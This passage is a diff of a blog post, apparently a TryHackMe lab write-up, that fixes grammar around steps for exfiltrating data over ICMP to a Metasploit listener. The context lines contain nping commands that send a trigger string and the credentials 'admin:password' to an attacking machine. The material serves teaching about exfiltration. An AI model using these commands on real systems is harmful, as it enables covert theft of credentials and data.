CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

 thm@icmp-host:~$ sudo nping --icmp 10.10.106.32 --data-string "BOFfile.txt" -c 1
 ```

 Now that we initiated the disk writing process, we can sent the data we want to exfiltrate, for example, the credentials `admin:password`.
-Note that we send the data without converting it to hex first, Metasploit does it for us:
+Note that we sent the data without converting it to hex first, Metasploit did that for us:

 ```shell
 # send the data we want to exfiltrate to the attacking machine
 thm@icmp-host:~$ sudo nping --icmp 10.10.106.32 --data-string "admin:password" -c 1
 ```

-Finally, we need to send the **EOF trigger**, which defaults to "*^EOF*", to let Metasploit that we send all the data needed:
+Finally, we need to send the **EOF trigger**, which defaults to "*^EOF*", to let Metasploit know that we have sent all the data we needed:

 ```shell
 # send the EOF trigger to the attacking machine